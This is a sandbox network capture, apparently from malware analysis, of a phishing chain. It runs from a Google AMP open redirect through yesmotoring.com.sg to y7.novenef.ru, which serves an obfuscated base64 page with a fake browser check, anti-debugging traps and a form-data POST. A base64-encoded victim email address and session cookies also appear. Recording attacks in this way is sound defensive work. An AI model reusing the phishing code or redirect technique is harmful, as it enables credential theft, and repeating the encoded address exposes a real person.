                                                                      2025-01-07 08:27:04 UTC306INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 6e 7a 2f 61 6d 70 2f 79 65 73 6d 6f 74 6f 72 69 6e 67 2e 63 6f 6d 2e 73 67 2f 75 70 74 68 65 72 65 2f 72 75 6e 6e 69 6e 67 2f 38 6d 73 70 62 66 37 31 69 30 6d 66 35 31 68 30 7a 66 68 77 68 75 32
                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.co.nz/amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2
                                                                      2025-01-07 08:27:04 UTC12INData Raw: 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                      Data Ascii: DY></HTML>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.1649710142.250.185.674436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:04 UTC971OUTGET /amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20= HTTP/1.1
                                                                      Host: www.google.co.nz
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: NID=520=LVcWUJwgx6KapFVhpgJ7Eo-DWc9UXuY6dAPr8IHEXhIcHEhyagOSMUoALBVVMlMEGD8TfxFva-K8usx04PDoWB4IY3gg91E2Nr0KCzmNCIf8y5FV5mgZM3b3ryzZ6PVk3H_vXtkaE2FkWUtmy8-S3bRWjxtsVbar735DbkGV30jR1T5wi64fvvFl5xTECBK4Rh3gaQ
                                                                      2025-01-07 08:27:05 UTC868INHTTP/1.1 302 Found
                                                                      Location: http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=
                                                                      Cache-Control: private
                                                                      X-Robots-Tag: noindex
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NARey182oKUvjp8FxJWhig' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                      Permissions-Policy: unload=()
                                                                      Date: Tue, 07 Jan 2025 08:27:05 GMT
                                                                      Server: gws
                                                                      Content-Length: 296
                                                                      X-XSS-Protection: 0
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
                                                                      2025-01-07 08:27:05 UTC296INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 79 65 73 6d 6f 74 6f 72 69 6e 67 2e 63 6f 6d 2e 73 67 2f 75 70 74 68 65 72 65 2f 72 75 6e 6e 69 6e 67 2f 38 6d 73 70 62 66 37 31 69 30 6d 66 35 31 68 30 7a 66 68 77 68 75 32 7a 2f 63 47 68 70 62 43 35 73 5a 58 4e 7a 59 58 4a 6b 51 47 31 76
                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1v


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.1649715104.21.64.14436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:07 UTC684OUTGET /Lj9e/ HTTP/1.1
                                                                      Host: y7.novenef.ru
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-Dest: document
                                                                      Referer: http://yesmotoring.com.sg/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:08 UTC1244INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, private
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkgoqB5RldLENMUrCjAGqmytxHW%2BoVNTP3XTE0YsTI6M%2BUeDIJq8zkNjVyqzICtBloKMGnGen92uWDR8dweoFl4UcrqekYnICRdI00aBVQA%2BoWuJ2%2BvXAjw5qKdbJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1239&min_rtt=1189&rtt_var=482&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1590&delivery_rate=2395290&cwnd=251&unsent_bytes=0&cid=3690d34d4b4cba5a&ts=414&x=0"
                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InZXcU9ld2JBc0MxQWNsWlNTVTl3TlE9PSIsInZhbHVlIjoicWVkdEtsSmFCRjhhTGl4Tjc4ZnhqOVpOMFRZWEVjdWU3SFMzWFZnSEFmYTVFN1lndWRtSldPRVQxcFp4VXVNUFd3NXpQVjZkYU1IZ1J3UCtnbWtmR3JHVlB3SFNvc0Q5VnRIS2thdXZpR1Awd05WOUNFNmkzV210dmJmK0FlQ20iLCJtYWMiOiJlMGUwNGMyMzYxMWY5YjVmNDU0NzdlYWZhZjdiNDA5YTQ0NjhhZTkwZWZhN2VlOWJkMDQ4YjQ3NzAxZjA5OGJjIiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 10:27:08 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                      2025-01-07 08:27:08 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 78 4b 57 45 30 78 63 57 4a 31 54 6d 34 76 54 57 6c 6f 56 54 46 73 52 58 46 77 55 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6e 52 49 53 32 4e 36 55 6c 52 31 56 53 39 4f 53 6d 52 73 4c 30 64 4b 62 58 42 61 4f 46 63 33 4f 57 74 56 57 58 4e 72 61 45 39 55 4f 55 39 54 4d 79 74 31 55 6c 64 55 61 45 6c 4f 54 46 42 4a 54 33 67 79 57 54 68 31 4d 33 52 36 54 55 56 50 62 31 46 6a 4e 56 5a 4e 4e 44 64 52 65 6d 6c 51 54 55 78 6a 65 6b 70 34 59 6d 77 78 61 6a 68 48 56 6d 30 34 51 32 74 31 65 6c 63 7a 56 55 39 5a 4d 6b 63 31 57 47 68 72 64 44 4e 33 63 6e 4a 59 4e 31 56 72 55 55 73 76 57 55 46 76 52 56 4e 4e 4e 30 70 46 62 46 42 6c 64 6a 55
                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImxKWE0xcWJ1Tm4vTWloVTFsRXFwUlE9PSIsInZhbHVlIjoiSnRIS2N6UlR1VS9OSmRsL0dKbXBaOFc3OWtVWXNraE9UOU9TMyt1UldUaElOTFBJT3gyWTh1M3R6TUVPb1FjNVZNNDdRemlQTUxjekp4YmwxajhHVm04Q2t1elczVU9ZMkc1WGhrdDN3cnJYN1VrUUsvWUFvRVNNN0pFbFBldjU
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 34 64 63 64 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 57 59 69 35 75 62 33 5a 6c 62 6d 56 6d 4c 6e 4a 31 4c 30 78 71 4f 57 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67
                                                                      Data Ascii: 4dcd<script>/* I find that the harder I work, the more luck I seem to have. */if(atob("aHR0cHM6Ly9WYi5ub3ZlbmVmLnJ1L0xqOWUv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAg
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 33 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 43 59 56 42 6a 64
                                                                      Data Ascii: FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTM3cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNCYVBjd
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d
                                                                      Data Ascii: 2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldm
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 62 32 35 7a 64 43 42 49 64 6c 5a 45 64 6b 39 52 59 6c 46 55 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 49 64 6c 5a 45 64 6b 39 52 59 6c 46 55 49 43 30 67 57 45 4e 6f 62 6d 31 42 53 47 5a 54 59 69 41 2b 49 47 52 4c 62 30 74 56 53 55 64 30 65 6d 77 67 4a 69 59 67 49 57 52 7a 53 32 56 55 53 30 74 73 5a 31 51 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 45 74 33 62 6c 52 6c 51 6b 39 4a 64 6c 6b 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 48 4e 4c 5a 56 52 4c 53 32 78 6e 56 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39
                                                                      Data Ascii: b25zdCBIdlZEdk9RYlFUID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChIdlZEdk9RYlFUIC0gWENobm1BSGZTYiA+IGRLb0tVSUd0emwgJiYgIWRzS2VUS0tsZ1QpIHsNCiAgICAgICAgICAgIEt3blRlQk9JdlkgPSB0cnVlOw0KICAgICAgICAgICAgZHNLZVRLS2xnVCA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 56 58 70 76 5a 31 68 72 61 30 4a 36 54 43 49 2b 44 51 70 44 61 47 56 6a 61 32 6c 75 5a 79 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 5a 58 49 67 64 47 38 67 62 57 46 70 62 6e 52 68 61 57 34 67 59 53 42 7a 5a 57 4e 31 63 6d 55 67 59 32 39 75 62 6d 56 6a 64 47 6c 76 62 69 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70
                                                                      Data Ascii: GRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iVXpvZ1hra0J6TCI+DQpDaGVja2luZyB5b3VyIGJyb3dzZXIgdG8gbWFpbnRhaW4gYSBzZWN1cmUgY29ubmVjdGlvbi4NCjwvZGl2Pg0KPC9mb3JtPg0KPC9kaXY+DQo8L2Rp
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 30 64 46 4a 48 53 6e 6c 57 55 6b 31 5a 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49
                                                                      Data Ascii: AgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YSh0dFJHSnlWUk1ZKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgI
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 29 3b 0d 0a 2f 2a 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2a 2f 0d 0a 69 66 28 61 78 77 48 6b 74 43 50 45 5a 20 3d 3d 20 5a 5a 75 71 73 77 47 55 63 70 29 7b 0d 0a 63 6f 6e 73 74 20 67 4f 6b 63 65 7a 6b 54 7a 4f 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 64 54 7a 6c 63 54 6a 65 4a 6a 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 64 54 7a 6c 63 54 6a 65 4a 6a 2e 70 61 74 68 6e 61 6d 65 20 3d 20 64 54 7a 6c 63 54 6a 65 4a 6a
                                                                      Data Ascii: );/* I find that the harder I work, the more luck I seem to have. */if(axwHktCPEZ == ZZuqswGUcp){const gOkcezkTzO = window.location.pathname.split('%23')[0].split('%3F')[0];if (dTzlcTjeJj.pathname.endsWith('/')) {dTzlcTjeJj.pathname = dTzlcTjeJj
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 61 61 6c 41 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 4a 68 55 47 4e 31 65 48 56 61 61 6c 41 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 51 6d 46 51 59 33 56 34 64 56 70 71 55 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 4a 68 55 47 4e 31 65 48 56 61 61 6c 41 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58
                                                                      Data Ascii: aalAgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0JhUGN1eHVaalAgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQmFQY3V4dVpqUCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0JhUGN1eHVaalAuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aX
                                                                      2025-01-07 08:27:08 UTC1369INData Raw: 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46
                                                                      Data Ascii: KSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmF


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.1649717151.101.2.1374436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:09 UTC619OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                      Host: code.jquery.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:09 UTC613INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 89501
                                                                      Server: nginx
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                      ETag: "28feccc0-15d9d"
                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 07 Jan 2025 08:27:09 GMT
                                                                      Age: 1722955
                                                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                                      X-Cache: HIT, HIT
                                                                      X-Cache-Hits: 2774, 5
                                                                      X-Timer: S1736238429.118258,VS0,VE0
                                                                      Vary: Accept-Encoding
                                                                      2025-01-07 08:27:09 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
